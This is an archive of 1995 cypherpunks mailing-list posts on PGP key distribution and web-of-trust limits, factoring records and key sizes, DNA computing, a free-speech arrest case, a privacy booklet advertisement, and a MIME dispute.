Subject: Re: UMich student arrested for rape story
Message-ID: <199502121026.CAA19268@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> From:          "L. McCarthy" <lmccarth@ducie.cs.umass.edu>

> Rich Dutcher writes:
> > They *do* have to prove intent -- as to how, that's what juries are 
> > for.  BTW, he used her real name in the post, with no disclaimers 
> > about fiction.  From what I have heard, if he had said the same thing 
> > in her presence, he could have been arrested for assault.
> 
> Based on the NY Times article I've read, you're omitting some important
> extenuating circumstances here. For one thing, it was apparently posted to
> alt.sex.stories, which seems to obviate the use of "fictional" disclaimers.
> Furthermore, he did _not_ identify her as a UMich student.
> 
Well, I was quoting a small AP story in a paper notorious for
clipping articles short, so I knew that some [if not many]
circumstances would be missing.  In conversations today at
Potlatch 4 I learned of other circumstances, albeit not
necessarily what I would call "extenuating" ones.  And the
lawyers, of course, will be spin controlling from now until a
verdict.

> I don't see the relevance of "if he had said the same thing in her presence".
> He *didn't* !  There's an enormous difference between making a comment about
> a person to third parties, and making the comment to that person.
> 
Not necessarily -- there's lots of case law that the threatened
person need not be present to be threatened.  The people present
are still witnesses.  I agree there's a difference, but its nature
isn't obvious.  Precisely what that difference is is up to judges,
juries and [goddess help us!] legislators.

> According to the NY Times story, the woman mentioned in the story only heard
> about it because reporters asked her about it !  I find a great deal of irony
> in the report that the controversy started because an alt.sex.stories reader
> in _Moscow_ tipped off the UMich authorities.
> 
Irony noted and appreciated -- but it does illustrate the "public" 
nature of the forum.

> It appears that the Russians are allowed to read erotic fiction, while the
> Americans are forbidden to read it, and get tossed in jail for writing it.
> We've come a long way, baby. Yeah.
> 
>  -L. Futplex McCarthy

I was in high school while the Supremes [the real Supremes, with 
Earl Warren, not the bogus nostalgia group currently wearing the 
black robes] were doing the decisions that allowed Joyce and Lawrence 
to be sold in bookstores, and I was taught Shakespeare from a 
bowlderized edition of Romeo & Juliet.  Trust me, we aren't in a 
place remotely like that now [not that there aren't plenty of people 
trying to get back there].

Which is not to say I'm complacent -- when I have money to spare from 
Green work, it goes to the ACLU.  Eternal vigilance and all that.  
And this dude is entitled to presumption of innocence, a jury trial, 
and all the other paraphenalia of procedural liberty.

However, given the information available to date, I see no reason to 
believe that he's been busted for writing "erotic fiction"  rather than 
threatening a woman.  Violence against women is too real, and in 
other contexts courts have held to a standard of what a "reasonable 
woman" might fear.

BTW, does alt.sex.stories presume fiction, or is it pretend truth 
like the readers' sex stories in Penthouse?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <0003701548@mcimail.com>
Date: Sun, 12 Feb 95 00:20:15 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Fwd: Re: West (just a minute)
Message-ID: <71950212081717/0003701548PJ2EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain



the most reasonable and easiest to implement solution to eliminating the
need for west's page number system is to just number each paragraph.
anyone can do this.


-----------------
Forwarded Message

Date:     Sat Feb 11, 1995  5:57 am  EST
Source-Date: Sat, 11 Feb 1995 05:49:47 -0500 (EST)
From:     Craig Hubley
          EMS: INTERNET / MCI ID: 376-5414
          MBX: craig@passport.ca
 
TO:     * Alan Pugh / MCI ID: 370-1548
Subject:  Re: West (just a minute)
Message-Id: 81950211105718/0003765414DC2EM
Source-Msg-Id: <m0rdFOe-0002IhC@forged.passport.ca>
U-Mime-Version: 1.0
U-Content-Type: text/plain; charset=US-ASCII
 

Hmm, 
how hard could it be to eliminate West page numbers?

There couldn't be more than a couple of cases on each page, 
if each page number were replaced by links to each case, a
lawyer could tell on the first glance which of the three was
right and mark it, assuming a reasonable HTML/SGML editor or
something.  Seems like it could be done as a part of daily work
and the results accreted somewhere.
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peace@BIX.com
Date: Sun, 12 Feb 95 02:50:41 PST
To: cypherpunks@toad.com
Subject: the problem that destroyed PGP
Message-ID: <9502120550.memo.29017@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Return-path: <peace@BIX.com>
Received: by bix.com (CoSy3.31.1.50) id <9502112132.memo.28092@BIX.com>;
 Sat, 11 Feb 1995 21:32:20 -0500 (EST)
From: peace@BIX.com
Date: Sat, 11 Feb 95 21:32:20 EST
To: cyperpunks@toad.com
Message-ID: <9502112132.memo.28092@BIX.com>
Subject: the problem that destroyed PGP

So finding a KeyID is the problem that destroys PGP eh?

Well I would just take that as the problem to solve, not a
reason to throw the baby out with the bath water.

All we need to do is design a distributed, hashed database.
Should be a piece 'o cake, right?

Let's see, first of all the problem is the receiver of a message
who gets just the KeyID.  First of all, the trusted keys should
be expected to be local (in some webby sense).  But lets assume
that the key is new, not in our local cache.  Now my scheme would put
a net of keyservers that ALL know each other.  The local environment
puts in a request to its usual keyserver.  That is the keyserver
that typically has the keys that the receiver is likely to trust.
Now it is certainly possible to imagine a case where a key is not
in the receiver's expected server, so what's next.  Well the 
keyserver knows ALL the other servers, right, so just copy the
original receiver's request to all the other keyservers.  If that
gets to be too big, just build a real net where every keyserver is
at most two hops away from any other one, then the intermediate
servers that could not honor the request would forward it to all 
the servers it knew.  I purposely propose that only two steps would
ever be necessary to limit the explosion, but I see that as no
real limitation, the rule could even be modified if there was
really any need.

Hey look, the net supports archie and a host of other non-structured
search mechanisms.  Why create a search hierarchy where such things
are not natural.  Why create a naming hierarchy where such things are
not natural.

By the way, the dockmaster.ncsc.mil note is a good example of a naming
hierarchy that has nothing to do with the employment of the person.
Anyone working in the security field can get an address there.  And
any member can get acm.org or ieee.org. But I can post from any of
there different net addresses which do not even agree at the very
most basic level.  So why would my KeyID be naturally associated with
any one of .net, .org or .com?

Peace ..Tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 06:50:56 PST
To: peace@bix.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <9502120550.memo.29017@BIX.com>
Message-ID: <9502121449.AA18809@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



peace@bix.com says:
> So finding a KeyID is the problem that destroys PGP eh?

No, it doesn't "destroy" it. PGP just needs a redesign to pass along
DNSable tags (like joe@some.domain.org) with keyIDs.

> Well I would just take that as the problem to solve, not a
> reason to throw the baby out with the bath water.

No one is proposing throwing it away. People are proposing small
changes to the format.

> All we need to do is design a distributed, hashed database.
> Should be a piece 'o cake, right?

No, we aren't going to do that, because its an administrative
nightmare, and I can't imagine proposing such a thing with a straight
face at an IETF meeting.

> Hey look, the net supports archie and a host of other non-structured
> search mechanisms.

No, it doesn't. Archie is a piece of shit that can't find what I need
about two thirds of the time and is slow as molasses and cannot
scale. It was a nice idea but its at the breaking point.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 12 Feb 95 10:20:57 PST
To: cypherpunks@toad.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121757.KAA12098@bogart.Colorado.EDU>
Message-ID: <199502121820.KAA04736@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"W. Kinney" <kinney@bogart.Colorado.EDU> writes:

>But web of trust _in and of itself_
>is not proving to be effective when applied to the problem of providing
>reliable key certification on the scale of the internet as a whole. 

Here is something I posted on this topic last year:

> From owner-cypherpunks@toad.com  Wed Mar 30 09:19:30 1994
> Date: Wed, 30 Mar 1994 09:17:40 -0800
> From: Hal <hfinney@shell.portal.com>
> Message-Id: <199403301717.JAA14861@jobe.shell.portal.com>
> To: cypherpunks@toad.com
> Subject: Web of Trust?
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Status: RO
> 
> One of the key concepts widely used to describe PGP is the "web of trust".
> This brings to mind a network of connections between people who know and
> communicate with each other.  Two people who want to communicate can do
> so securely if there is a path of connections in the form of signed keys
> that joins them.
> 
> But this is not quite right.  The fundamental fact about PGP key signatures,
> which is often misunderstood, is this:
> 
> You can only communicate securely with someone whose key is signed by a person
> you know, either personally or by reputation.
> 
> In other words, if I want to communicate with joe@abc.com, I can only do so
> if one of the signators of his key is a person I know.  If not, I have no way
> of judging the validity of his key.
>  
> This belies simple interpretations of the "web of trust".  I may have signed
> A's key, A has signed B's, B has signed C's, C has signed D's, and D has signed
> Joe's, but this is of no value unless I know D.  Only then can I trust Joe's
> key.
> 
> This means that, in the "web" picture, I can only communicate securely with
> people who are at most two hops away in the web of connections.  I can
> communicate with the people I know, and I can communicate with the people they
> know, and that is it.
> 
> This is unfortunate, because the simple web model ties into some famous
> research which suggests that any two people chosen at random are only about
> half a dozen steps apart in the web of who-knows-whom connections.  (This
> result is where the title of the movie "Six Degrees of Separation" comes from.)
> If you had a system which actually supported communications via such a web
> model, it actually would have hope of letting two people communicate who did
> not have a very long chain between them.  But PGP, with a maximum chain length
> of two, will not allow this.
> 
[Discussion of possible extensions elided]
> 
> Without this, I think we will continue to have problems with PGP being unable
> to validate keys of people we want to communicate with.  People will collect
> huge laundry lists of signatures in the hopes that whoever wants to commu-
> nicate with them will know one of those people.  Centralized key validators
> will appear (as in the case of the SLED service being started now, which will
> sign a key based on a signed check with your name on it).  The result may be
> a choice between using an unsigned key or using one signed by some faceless
> bureaucracy, which is no better than the original PEM conception.
> 
> (People may be confused by this essay because they thought PGP worked this
> way already.  PGP does have a follow-the-web model, but that is only for
> following signatures.  In the example above, where I wanted to talk to Joe
> and there was a chain to him through A, B, C, and D, we have to first sup-
> pose that I know and trust all of A, B, C, and D.  Given that, what PGP can
> do is to determine whether I have valid keys for all of those people.  It will
> notice that A has signed B's key, so it is valid.  I know B and told PGP he
> was trustworthy, and he signed C's key, so therefore that one is valid.  Sim-
> ilarly, I know C and I know D so PGP can follow the chain through them.  Fin-
> ally we come to Joe, whom I don't know, but because I know D and PGP followed
> the web to determine that D's key is valid, PGP can determine that Joe's key
> is valid.  But again, that was only because I knew D and everyone else in
> the chain.  The bottom line is still that I can only communicate with people
> who know someone I know.)
>  
> Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sun, 12 Feb 95 08:27:13 PST
To: cypherpunks@toad.com
Subject: Q: ref. for DNA used to solve math. network prob. (fwd)
Message-ID: <199502121623.KAA00375@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
 
> Message-Id: <m0rdRDS-0005iFa@hip-hop.hh.sbay.org>
> Date: Sat, 11 Feb 95 15:27 PST
> From: jwgruber@aol.com (JWGruber)
> Subject: Q: ref. for DNA used to solve math. network prob.
> Designated-To: Internet Amateur Mathematics Society
> 
> Hi - I am looking for a reference (newspaper or popular magazine) on a
> recent article that described the use of DNA and genetic expression to
> solve a complex mathematical problem (linear algebra-matrix systems I
> believe) regarding a network of paths or routes between cities. Does
> anyone have a reference on this work ? I would be greatly obliged if I
> could receive a note on this. Thank you !
> John W. Gruber
> Philadelhia College of Pharmacy & Science
> JWGruber@aol.com
>
Only peripheraly related to crypto but has anyone got any info on this?

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 12 Feb 95 09:57:47 PST
To: cypherpunks@toad.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121727.MAA20000@crypto.com>
Message-ID: <199502121757.KAA12098@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:

> I don't think anyone has suggested there's any one problem that
> "destroys" PGP.  Several people have pointed out a number of problems
> that limit PGP's scalability in various ways.  Its flat key ID
> namespace is one.  Lack of functional modularity is another.  Its
> fixed certification model is still another. 

Certification really does need to be added to the discussion on scaling.
In the sense that I want to be able to download a stranger's key from 
a key server and have some idea of its reliablility, web of trust has
turned out to be a real failure, IMO. There's no "web", rather a large
set of disconnected "islands" of signatures. I'm looking at the latest
keyring from MIT right now, and noticing that most of the keys are
either unsigned or self-signed. The majority of the rest have signatures,
but signatures that are unconnected to me via the web of trust, so that
they are entirely useless. I suspect that my situation is by far the
most common one: the only keys that I have any verifiable authentication
for are ones I've signed myself, or ones that are signed by people 
in my immediate circle. The chain of signatures dies very close to me.

This isn't a criticism of PGP's key certification paradigm -- PGP allows
centralized certification (I see a few keys signed by SLED, for instance),
and it also allows me the flexibility of having mutual certification within
the circle of people I mail regularly. But web of trust _in and of itself_
is not proving to be effective when applied to the problem of providing
reliable key certification on the scale of the internet as a whole. 


                                  -- Will



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 12 Feb 95 10:10:30 PST
To: perry@imsi.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <9502121802.AA19017@snark.imsi.com>
Message-ID: <199502121810.LAA12147@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:

> I think the jury is still out on that. Web-of-trust is still really
> untested because of the difficulties in widespread deployment of
> PGP. As it stands, PGP is still a hacker's toy -- the lack of a

Perhaps you're right. Your argument here, as I see it, is that web-of-trust
becomes _more_ functional as it becomes adopted on a larger scale. This
might end up being true and it might not, although there seems to be
no evidence as of yet of increasing "connectivity" of signatures as PGP
becomes more widely used, which was the point I was trying to make. The
unresolved question is whether or not there will be a critical point at
which the web will become widely connected. The answer does not seem at
all clear to me.

                               -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 12 Feb 95 11:19:25 PST
To: cypherpunks@toad.com
Subject: Design my protocol
Message-ID: <v01510100ab640747eb76@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a question for all the gurus out there: I work for a company that
manufactures a new concept in telephony hardware. The system we developed
essentially replaces PBXs with an off-the-shelf computer, some special
cards, and some software. Our system will offer all the features that you'd
expect from current PBXs, such as least cost routing, as well as other
features that can't be provided by a standard PBX.

When a customer sets up a site, the system connects via a modem to our
server, from which the system retrieves software, routing tables, etc. We
also offer periodic software updates, and software based add-on features
for an additional free. We would like to be able to upgrade, and in some
cases control, the sites by remote and we would like the customer to be
able to purchase extra software from us via modem or over the net. We use
TCP/IP and SNMP to comunicate with the sites. We want to include strong
crypto from the begining for several purposes:

-Link encryption between the customer sites and us.
-Authentication of the upgrade software.
-Secure purchases and transmision of software both via dial-up and the Internet.
-Optional encryption of the (telephony) data carried between sites.

I understand that the last issue is somewhat different from the others, I
just mentioned it to complete the picture. For now I need a solution for
the first two or three questions. We need something that can be delivered
to the customer six months from now, not something that may make it out of
a standard comittee years from now.

Thanks in advance,


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 12 Feb 95 09:25:57 PST
To: peace@bix.com
Subject: Re: the problem that destroyed PGP
In-Reply-To: <9502120550.memo.29017@BIX.com>
Message-ID: <199502121727.MAA20000@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



Peace@BIX.com writes:
>So finding a KeyID is the problem that destroys PGP eh?
>
...

I don't think anyone has suggested there's any one problem that
"destroys" PGP.  Several people have pointed out a number of problems
that limit PGP's scalability in various ways.  Its flat key ID
namespace is one.  Lack of functional modularity is another.  Its
fixed certification model is still another.  There are more, and
no doubt still others waiting to be discovered as the user base
grows.  Any secure communications system that aspires to large-scale
penetration, whether called "PGP" or something else, will have to
tackle these kinds of issues before it will be successful.  Some
of the issues are obvious, while others only become apparent after
some experience.  Scale, after all, has a way of turning easy
problems into surprisingly hard ones.

For whatever reason, PGP has attracted an almost cult-like following,
and this has so far helped the spread of secure email.  But this
cuts both ways; cult status or not, PGP has to continue to evolve
and adapt to large-scale, mainstream demands by applying the lessons
of other big systems.  If it doesn't, rest assured that companies
like Microsoft and AT&T will do just fine with whatever they decide
the market wants.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 12 Feb 95 11:33:39 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121820.KAA04736@jobe.shell.portal.com>
Message-ID: <199502121933.MAA12403@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney writes, in regard to web-of-trust:

> But this is not quite right.  The fundamental fact about PGP key signatures,
> which is often misunderstood, is this:
> 
> You can only communicate securely with someone whose key is signed by a person
> you know, either personally or by reputation.
> 
> In other words, if I want to communicate with joe@abc.com, I can only do so
> if one of the signators of his key is a person I know.  If not, I have no way
> of judging the validity of his key.

There are, however, degrees of certainty here. The only person I trust
implicitly to sign keys is myself. If I have a key which is separated from
me by more than one hop in the web of trust, but still connected to me
via a chain of signatures, I have more certainty that this key is valid
than I do for an unsigned key. Granted, if I don't know the actual signator
of a particular key, my level of trust in the key's validity is pretty
low, but it's nonzero as long as it's connected by a chain of signatures.
The ease of mounting of a man-in-the-middle attack decreases with increasing 
signature connectivity, no?

Of course, the reality is that use of totally unverified PGP keys is
widespread, even among people who are well educated on the subject. This
is not a good thing in the long run.


                                  -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 10:03:08 PST
To: "W. Kinney" <kinney@bogart.colorado.edu>
Subject: Re: the problem that destroyed PGP
In-Reply-To: <199502121757.KAA12098@bogart.Colorado.EDU>
Message-ID: <9502121802.AA19017@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"W. Kinney" says:
> This isn't a criticism of PGP's key certification paradigm -- PGP allows
> centralized certification (I see a few keys signed by SLED, for instance),
> and it also allows me the flexibility of having mutual certification within
> the circle of people I mail regularly. But web of trust _in and of itself_
> is not proving to be effective when applied to the problem of providing
> reliable key certification on the scale of the internet as a whole. 

I think the jury is still out on that. Web-of-trust is still really
untested because of the difficulties in widespread deployment of
PGP. As it stands, PGP is still a hacker's toy -- the lack of a
library or an easy to use global key distribution infrastructure mean
that we have yet to see what can be done. I think that mutually
authenticating organizations with small trust pyramids within the
organizations, but without a global key pyramid, may come to prove
very practical.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sun, 12 Feb 95 10:23:14 PST
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <Pine.SOL.3.90.950210075752.11373A-100000@use.usit.net>
Message-ID: <199502121822.NAA06249@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Any punishment on the books for politce who knowingly violate the law seems
pointless, since they can technically be prosecuted for violating civil
rights anyway.  As it is, juries tend to believe police testimony no matter
what side they are on (prosecution or defense).

It's rare that police are prosecuted for brutaliy cases, and corruption
trials fizzle out because of the "blue wall" effect.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Sun, 12 Feb 95 10:40:09 PST
To: kien@MINERVA.CIS.YALE.EDU
Subject: Privacy digest an all
Message-ID: <Pine.SUN.3.91.950212133556.11884A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


I found this on another list that I"m on.  I have no connection at all 
with the distributor, but I thought that it would be interesting to share 
it with the list.

Ben.

________


1.  New Publication: PRIVACY & GEMS: HOW TO AVOID THE PRIVACY INVADERS
We all have something to hide, right?  From nosy neighbors, burglars, our
spouses, private detectives, but most of all the government and business.
In this 38-page booklet, you will  learn how the government and business,
through the extensive use of super-computers, is compiling data on ever
facet of your life.  Discover exactly how they do it.  The amount of
information kept on you is astounding: bank statements, investments,
credit histories, medical records, school transcripts, driving histories,
videotape rentals, retail purchases, tax returns, legal records, and more!
This booklet explains who is collecting information on you and what they
are doing with it.  Your dossier is compiled and sold without your
permission or knowledge.  Find out what technologies are available today,
and their frightening implications for tomorrow.  We are on the verge of a
1984 Orwellian-type Police State!

How can you keep some of your life private?  After you read this booklet,
at least you will have some idea! Learn how to make untraceable telephone
calls.  Be prepared for the New Money . There are a few  low-profile
investments that do not generate reports to business or  government.  Learn
what they are and how to go about protecting yourself from the privacy
invaders.  Once you have shifted some of your assets from high -profile
assets to low-profile assets, learn how to store and conceal them so you
will not be discovered.  Subjects covered include:
Why Privacy?, Political Persecution, High-Risk Business, Divorce, Probate,
Protection from Robbery, Protection from Government Seizure, The Future:
The Total Surveillance State, "Smart Cars", "Smart Cards", "Video
Surveillance", "Satellite, Surveillance", "Clipper Chip", "Robot Spies", The
Future Workplace:  A Look At Electronic Banking System, Inc., How Profiles
Are Created, Damaging Dossiers, Privacy And The  Telephone, The New Be A
Private Investor, An Analysis Of Low-Profile Investments, Diamonds and
Precious Gems, Rare Coins, Foreign Currency, Collectibles, 
Cash, The Tangible Investment Philosophy, Recent DeBeers Diamond Price
Hikes, Long Term Investment Gem Performance, Low-Profile Strategies In A
High-Profile World, Confidential Model Portfolio For Privacy Clients, 10
Rules For Gem Investing, How To Safeguard Your Valuables.  This is an
excellent tool for anyone concerned with our vanishing privacy.  Here is how
you order:  Send $9.95 ppd (includes first class postage). Illinois
Residents add 6.5% sales tax.  to: Superior Broadcasting Company, Box 668,
Lindenhurst, IL 60046.  Request #119O  "Privacy & Gems: A Special Report by
Bob Genis"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 12 Feb 95 12:33:25 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <0jCxBn=0Eyt5AxShYL@nsb.fv.com>
Message-ID: <9502122031.AA23722@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Fri, 10 Feb 1995 15:58:27 -0500 (EST)
    From: Nathaniel Borenstein <nsb@nsb.fv.com>
    
    Well, I have no idea why you think that MIME is an "atrocity" or
    "slime", but it is perfectly clear that you have no idea what it
    actually *is*, since "X-" headers have nothing whatsoever to do with
    MIME.  The "X-" headers are defined by RFC 822, which has been the
    standard for Internet mail formats since 1982.

You base a large conclusion on a small piece of data in combination
with some poor duduction.  Unless you are claiming that MIME violates
RFC 822 with respect to the handling of X- headers you have made a
number of false claims in the paragraph above.
    
    Perhaps you should learn what MIME is before you embarass yourself
    further.

Unless it has changed radically in the 6 months since I read all of
the RFCs that were then available (I believe that rtfm.mit.edu was my
source at the time), then I have already taken the step that you
suggest -- in fact, it is largely what caused me to form the opinions
that I have with respect to MIME.  It is possible for someone to find
ugliness where you find beauty without them necessarily being
uninformed.

I must admit that Perry's references to secure multi-parts make me
think that another review is in order.  I'm certainly not an expert,
but then nothing in what was readily available provided much
encouragement for further exploration.  However, I have learned enough
of what MIME is that I am not embarrased by your incorrect inferences.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sun, 12 Feb 95 12:55:43 PST
To: jwgruber@aol.com
Subject: Re: Q: ref. for DNA used to solve math. network prob. (fwd)
In-Reply-To: <199502121623.KAA00375@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.950212154435.623A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Feb 1995, root wrote:

[forwarded note from jwgruber deleted]

> >
> Only peripheraly related to crypto but has anyone got any info on this?
> 

Here is the reference, additionally there is a nice News & Views article 
on page 993-994 of the same issue..

Author   Adleman LM. 

Title    MOLECULAR COMPUTATION OF SOLUTIONS TO COMBINATORIAL PROBLEMS.
   
Source   Science.  266(5187):1021-1024, 1994 Nov 11.

Abstract
    The tools of molecular biology were used to solve an instance of 
the directed Hamiltonian path problem. A small graph was encoded in 
molecules of DNA, and the ''operations'' of the computation were performed 
with standard protocols and enzymes. This experiment demonstrates 
the feasibility of carrying out computations at the molecular 
level.  

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 12 Feb 95 17:09:06 PST
To: cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <Pine.3.89.9502121608.A20084-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Zachary <zachary@pentagon.io.com> wrote:
 Most cryptosystems that we seem to use are based
on the assumption that factoring large numbers is a Hard Problem.  Isn't
this putting all our eggs in one basket?  Are there other Hard Problems
crypto systems can be based on?

There is of course the discrete log problem - DH and all that.

Unfortunately, although the discrete log problem has not been
shown to be equivalent to the factoring problem, every 
factoring advance immediately leads to a corresponding
discrete log advance and vice versa, and the two problems
take a very similar length of time to solve, suggesting
that the two problems have some deep equivalence.

So far no one has found a way of applying NP problems to
Crypto.

And that pretty much wraps it up.

There are of course a lot of hard problems that are not NP,
yet probably take exponential time, but obviously you
want a well understood problem that is part of conventional
mathematics.

This narrows the field rather drastically.

Discrete log and factoring pretty much covers it.

Of course you can do discrete log on weird fields -- there
is a lot of research in that which I do not understand at all.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 12 Feb 95 17:13:08 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <ab645cdf0102100421a7@[132.162.201.201]>
Message-ID: <Pine.3.89.9502121727.A20084-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Feb 1995, Jonathan Rochkind wrote:
> Keep in mind that it's been mathematically proven that factoring is
> NP-complete.  That is, it's in the set of problems including such things as
> discrete logs and the travelling salesman problem, such that if a
> polynomial time solution is found to _any_ of these problems, one can be
> found for all of them. i

This is news to me!

I am fairly sure that factoring and discrete log are *not*
NP complete, and indeed there is no known way to use
NP complete problems for crypto.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schneier@chinet.chinet.com
Date: Sun, 12 Feb 95 15:39:37 PST
To: cypherpunks@toad.com
Subject: Factoring - State of the Art and Predictions
Message-ID: <m0rdnqt-000k5xC@mailbox.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


((Comments are appreciated.  -Bruce))


Factoring large numbers is hard.  Unfortunately for algorithm
designers, it is getting easier.  Even worse, it is getting
easier faster than mathematicians expected.  In 1976 Richard Guy
wrote: "I shall be surprised if anyone regularly factors numbers
of size 10^80 without special form during the present century." 
In 1977 Ron Rivest said that factoring a 125-digit number would
take 40 quadrillion years.  In 1994 a 129-digit number was
factored.  If there is any lesson in all this, it is that making
predictions is foolish.

Table 1 shows factoring records over the past dozen years.  The
fastest factoring algorithm during the time was the quadratic
sieve.

         Table 1:  Factoring Using the Quadratic Sieve

         year     # of decimal               how many times harder to
                  digits factored            factor a 512-bit number
         1983     71                         > 20 million
         1985     80                         > 2 million
         1988     90                         250,000
         1989     100                        30,000
         1993     120                        500
         1994     129                        100

These numbers are pretty frightening.  Today it is not uncommon
to see 512-bit numbers used in operational systems.  Factoring
them, and thereby completely compromising their security, is well
in the range of possibility: A weekend-long worm on the Internet
could do it.

Computing power is generally measured in mips-years: a one-
million-instruction-per-second computer running for one year, or
about 3*10^13 instructions.  By convention, a 1 mips machine is
equivalent to the DEC VAX 11/780.  Hence, a mips-year is a VAX
11/780 running for a year, or the equivalent.

The 1983 factorization of a 71-digit number required 0.1 mips-
years; the 1994 factorization of a 129-digit number required
5000.  This dramatic increase in computing power resulted largely
from the introduction of distributed computing, using the idle
time on a network of workstations.  The 1983 factorization used
9.5 CPU hours on a single Cray X-MP; the 1994 factorization used
the idle time on 1600 computers around the world for about 8
months.  Modern factoring methods lend themselves to this kind of
distributed implementation.

The picture gets even worse.  A new factoring algorithm has taken
over from the quadratic sieve: the general number field sieve. 
In 1989 mathematicians would have told you that the general
number field sieve would never be practical.  In 1992 they would
have told you that it was practical, but only faster than the
quadratic sieve for numbers greater than 130-150 digits or so. 
Today it is known to be faster than the quadratic sieve for
numbers well below 116 digits.  The general number field sieve
can factor a 512-bit number over 10 times faster than the
quadratic sieve.  The algorithm would require less than a year to
run on an 1800-node Intel Paragon.  Table 2 gives the number of
mips-years required to factor numbers of different sizes, given
current implementations of the general number field sieve.

         Table 2: Factoring Using the General Number Field Sieve

         # of bits         mips-years required to factor

         512               30,000
         768               2*10^8
         1024              3*10^11
         1280              1*10^14
         1536              3*10^16
         2048              3*10^20

And the general number field sieve is still getting faster. 
Mathematicians keep coming up with new tricks, new optimizations,
new techniques.  There's no reason to think this trend won't
continue.  A related algorithm, the special number field sieve,
can already factor numbers of a certain specialized form--numbers
not generally used for cryptography--must faster than the general
number field sieve can factor general numbers of the same size. 
